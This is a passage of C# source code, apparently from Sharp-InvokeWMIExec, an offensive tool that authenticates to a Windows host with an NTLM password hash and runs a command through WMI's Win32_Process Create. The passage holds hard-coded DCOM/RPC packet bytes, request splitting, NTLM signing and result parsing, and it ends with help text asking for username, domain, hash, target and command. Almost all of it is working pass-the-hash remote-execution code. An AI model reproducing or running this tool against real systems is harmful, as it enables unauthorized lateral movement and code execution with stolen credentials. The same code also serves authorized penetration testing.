0xd4, 0x02, 0x00, 0x00, 0xb1, 0x03, 0x00, 0x00, 0x15, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x12, 0x04, 0x00, 0x80, 0x00, 0x5f, 0x5f, 0x50, 0x41, 0x52, 0x41, 0x4d, 0x45, 0x54, 0x45, 0x52, 0x53, 0x00, 0x00, 0x61, 0x62, 0x73, 0x74, 0x72, 0x61, 0x63, 0x74, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x4c, 0x69, 0x6e, 0x65, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x37, 0x00, 0x00, 0x00, 0x00, 0x49, 0x6e, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x37, 0x00, 0x00, 0x00, 0x5e, 0x00, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0x94, 0x00, 0x00, 0x00, 0x00, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x41, 0x50, 0x49, 0x7c, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x20, 0x61, 0x6e, 0x64, 0x20, 0x54, 0x68, 0x72, 0x65, 0x61, 0x64, 0x20, 0x46, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x7c, 0x6c, 0x70, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x4c, 0x69, 0x6e, 0x65, 0x20, 0x00, 0x00, 0x4d, 0x61, 0x70, 0x70, 0x69, 0x6e, 0x67, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x37, 0x00, 0x00, 0x00, 0x5e, 0x00, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0xca, 0x00, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x49, 0x44, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x59, 0x01, 0x00, 0x00, 0x5e, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0xca, 0x00, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x8c, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x11, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x43, 0x75, 0x72, 0x72, 0x65, 0x6e, 0x74, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6f, 0x72, 0x79, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x85, 0x01, 0x00, 0x00, 0x00, 0x49, 0x6e, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x85, 0x01, 0x00, 0x00, 0xac, 0x01, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0xe2, 0x01, 0x00, 0x00, 0x00, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x41, 0x50, 0x49, 0x7c, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x20, 0x61, 0x6e, 0x64, 0x20, 0x54, 0x68, 0x72, 0x65, 0x61, 0x64, 0x20, 0x46, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x7c, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x7c, 0x6c, 0x70, 0x43, 0x75, 0x72, 0x72, 0x65, 0x6e, 0x74, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6f, 0x72, 0x79, 0x20, 0x00, 0x00, 0x4d, 0x61, 0x70, 0x70, 0x69, 0x6e, 0x67, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x85, 0x01, 0x00, 0x00, 0xac, 0x01, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x2b, 0x02, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0xda, 0x01, 0x00, 0x00, 0x00, 0x49, 0x44, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xba, 0x02, 0x00, 0x00, 0xac, 0x01, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x2b, 0x02, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0xda, 0x01, 0x00, 0x00, 0x72, 0x02, 0x00, 0x00, 0x11, 0x03, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x53, 0x74, 0x61, 0x72, 0x74, 0x75, 0x70, 0x49, 0x6e, 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x00, 0x00, 0x6f, 0x62, 0x6a, 0x65, 0x63, 0x74, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xef, 0x02, 0x00, 0x00, 0x00, 0x49, 0x6e, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xef, 0x02, 0x00, 0x00, 0x16, 0x03, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0x4c, 0x03, 0x00, 0x00, 0x00, 0x57, 0x4d, 0x49, 0x7c, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x5f, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x53, 0x74, 0x61, 0x72, 0x74, 0x75, 0x70, 0x00, 0x00, 0x4d, 0x61, 0x70, 0x70, 0x69, 0x6e, 0x67, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xef, 0x02, 0x00, 0x00, 0x16, 0x03, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x66, 0x03, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x44, 0x03, 0x00, 0x00, 0x00, 0x49, 0x44, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0xf5, 0x03, 0x00, 0x00, 0x16, 0x03, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x66, 0x03, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x44, 0x03, 0x00, 0x00, 0xad, 0x03, 0x00, 0x00, 0x11, 0x03, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x6f, 0x62, 0x6a, 0x65, 0x63, 0x74, 0x3a, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x5f, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x53, 0x74, 0x61, 0x72, 0x74, 0x75, 0x70 }) 843 | .Concat(new byte[501]) 844 | .Concat(Command_Length) 845 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3c, 0x0e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x01 }) 846 | .Concat(Command_Length2) 847 | .Concat(new byte[] { 0x00, 0x80, 0x00, 0x5f, 0x5f, 0x50, 0x41, 0x52, 0x41, 0x4d, 0x45, 0x54, 0x45, 0x52, 0x53, 0x00, 0x00 }) 848 | .Concat(Command_Bytes) 849 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray(); 850 | 851 | if (Stub_Data.Length < Request_Split_Index) 852 | { 853 | Request_Flags = new byte[] { 0x83 }; 854 | WMI_Client_Stage_Next = "Result"; 855 | } 856 | else 857 | { 858 | Request_Split = true; 859 | double Request_Split_stage_final = Math.Ceiling((double)Stub_Data.Length / Request_Split_Index); 860 | if (Request_Split_Stage < 2) 861 | { 862 | Request_Length = Stub_Data.Length; 863 | Stub_Data = Utilities.GetByteRange(Stub_Data, 0, Request_Split_Index - 1); 864 | Request_Split_Stage = 2; 865 | Sequence_Number_Counter = 10; 866 | Request_Flags = new byte[] { 0x81 }; 867 | Request_Split_Index_Tracker = Request_Split_Index; 868 | WMI_Client_Stage_Next = "Request"; 869 | } 870 | else if (Request_Split_Stage == Request_Split_stage_final) 871 | { 872 | Request_Split = false; 873 | Sequence_Number = BitConverter.GetBytes(Sequence_Number_Counter); 874 | Request_Split_Stage = 0; 875 | Stub_Data = Utilities.GetByteRange(Stub_Data, Request_Split_Index_Tracker, Stub_Data.Length); 876 | Request_Flags = new byte[] { 0x82 }; 877 | WMI_Client_Stage_Next = "Result"; 878 | } 879 | else 880 | { 881 | Request_Length = Stub_Data.Length - Request_Split_Index_Tracker; 882 | Stub_Data = Utilities.GetByteRange(Stub_Data, Request_Split_Index_Tracker, Request_Split_Index_Tracker + Request_Split_Index - 1); 883 | Request_Split_Index_Tracker += Request_Split_Index; 884 | Request_Split_Stage++; 885 | Sequence_Number = BitConverter.GetBytes(Sequence_Number_Counter); 886 | Sequence_Number_Counter++; 887 | Request_Flags = new byte[] { 0x80 }; 888 | WMI_Client_Stage_Next = "Request"; 889 | } 890 | } 891 | 892 | 893 | } 894 | 895 | } 896 | break; 897 | } 898 | Packet_RPC = WMIExec.RPCRequest(Request_Flags, Stub_Data.Length, 16, Request_Auth_Padding, Request_Call_ID, Request_Context_ID, Request_Opnum, Request_UUID); 899 | 900 | if (Request_Split) 901 | { 902 | Packet_RPC["RPCRequest_AllocHint"] = BitConverter.GetBytes(Request_Length); 903 | } 904 | 905 | Packet_NTLMSSP_Verifier = WMIExec.NTLMSSPVerifier(Request_Auth_Padding, new byte[] { 0x04 }, Sequence_Number); 906 | NTLMSSP_Verifier = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Verifier); 907 | RPC_Sign = Sequence_Number.Concat(Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC)) 908 | .Concat(Stub_Data) 909 | .Concat(Utilities.GetByteRange(NTLMSSP_Verifier, 0, Request_Auth_Padding + 7)).ToArray(); 910 | 911 | RPC_Signature = HMAC_MD5.ComputeHash(RPC_Sign); 912 | RPC_Signature = Utilities.GetByteRange(RPC_Signature, 0, 7); 913 | Packet_NTLMSSP_Verifier["NTLMSSPVerifier_NTLMSSPVerifierChecksum"] = RPC_Signature; 914 | NTLMSSP_Verifier = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Verifier); 915 | 916 | WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC).Concat(Stub_Data).Concat(NTLMSSP_Verifier).ToArray(); 917 | WMI_Client_Random_Port_Stream.Write(WMI_Client_Send, 0, WMI_Client_Send.Length); 918 | WMI_Client_Random_Port_Stream.Flush(); 919 | 920 | if (!Request_Split) 921 | { 922 | WMI_Client_Random_Port_Stream.Read(WMI_Client_Receive, 0, WMI_Client_Receive.Length); 923 | } 924 | 925 | while (WMI_Client_Random_Port_Stream.DataAvailable) 926 | { 927 | WMI_Client_Random_Port_Stream.Read(WMI_Client_Receive, 0, WMI_Client_Receive.Length); 928 | Thread.Sleep(10); 929 | } 930 | WMI_Client_Stage = WMI_Client_Stage_Next; 931 | } 932 | break; 933 | case "Result": 934 | { 935 | while (WMI_Client_Random_Port_Stream.DataAvailable) 936 | { 937 | WMI_Client_Random_Port_Stream.Read(WMI_Client_Receive, 0, WMI_Client_Receive.Length); 938 | Thread.Sleep(10); 939 | } 940 | 941 | if (WMI_Client_Receive[1145] != 9) 942 | { 943 | Target_Process_ID = Utilities.DataLength(1141, WMI_Client_Receive); 944 | success = true; 945 | } 946 | 947 | WMI_Client_Stage = "exit"; 948 | } 949 | break; 950 | } 951 | Thread.Sleep(10); 952 | } 953 | WMI_Client_Random_Port.Close(); 954 | WMI_Client_Random_Port_Stream.Close(); 955 | } 956 | } 957 | WMI_Client.Close(); 958 | WMI_Client_Stream.Close(); 959 | } 960 | if (success) 961 | { 962 | output.AppendLine(String.Format("Command executed with process ID {0} on {1}", Target_Process_ID, Target_Long)); 963 | } 964 | else 965 | { 966 | output.AppendLine("Process did not start, check your command"); 967 | } 968 | Console.WriteLine(output.ToString()); 969 | } 970 | 971 | //Begin Helper Functions. 972 | public static void displayHelp(string message) 973 | { 974 | Console.WriteLine("{0} \r\nSharp-InvokeWMIExec.exe username: domain: hash: target: command:", message); 975 | Environment.Exit(-1); 976 | } 977 | } 978 | } 979 | --------------------------------------------------------------------------------